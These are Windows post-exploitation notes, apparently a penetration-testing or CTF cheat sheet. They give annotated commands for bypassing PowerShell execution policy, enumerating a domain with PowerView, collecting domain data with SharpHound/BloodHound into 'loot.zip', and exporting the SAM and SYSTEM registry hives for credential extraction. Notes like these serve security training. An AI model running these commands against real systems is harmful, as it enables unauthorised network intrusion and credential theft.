# Windows Post Exploitation

# Powerview

PowerView is a PowerShell script (shipped with PowerShell Empire) used to enumerate a domain after obtaining a shell on a system.

powershell -ep bypass                               # start a new PowerShell process with the execution policy bypassed
. .\Downloads\PowerView.ps1                         # dot-source PowerView so its functions are available in this session
Get-NetUser | select cn                             # enumerate domain users, showing only the common name (cn)
Get-NetGroup -GroupName *admin*                     # enumerate groups whose name contains "admin"
Invoke-ShareFinder                                  # enumerate network shares
Get-NetComputer -fulldata | select operatingsystem  # enumerate domain computers, showing only the operating system

cheatsheet: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

# Sharphound

powershell -ep bypass                              # start a new PowerShell process with the execution policy bypassed
. .\Downloads\SharpHound.ps1                       # dot-source SharpHound so Invoke-Bloodhound is available in this session
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip   # collect domain data for BloodHound into loot.zip (CONTROLLER.local is the example domain used in these notes)

# Bloodhound

On the remote box:

powershell -ep bypass           # bypass execution policy, same as with PowerView
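# Dot-source SharpHound (leading "." and a space, as in the SharpHound section).
# Running the script directly (.\Downloads\SharpHound.ps1) defines its functions
# only in the script's own scope, so the Invoke-Bloodhound call below would not
# be recognized.
. .\Downloads\SharpHound.ps1
# Get "loot": collect domain data for BloodHound into loot.zip
# (CONTROLLER.local is the example domain name used in these notes)
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
# move loot.zip to the local box and open it with BloodHound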

On the local box:

sudo neo4j console              # on local box: start neo4j (the database BloodHound connects to); default creds are neo4j:neo4j
http://localhost:7474/browser/  # navigate here to change the default creds, otherwise bloodhound won't let you in.
bloodhound                      # launch the BloodHound client and import loot.zip
# NOTE: some versions of bloodhound are buggy and require you to drag loot.zip onto the application window for the import to work

# Download SAM and System from registry

reg save HKLM\SAM SAM        # export the SAM registry hive to a file named SAM in the current directory
reg save HKLM\System System  # export the SYSTEM hive to a file named System (used together with SAM); typically requires an elevated shell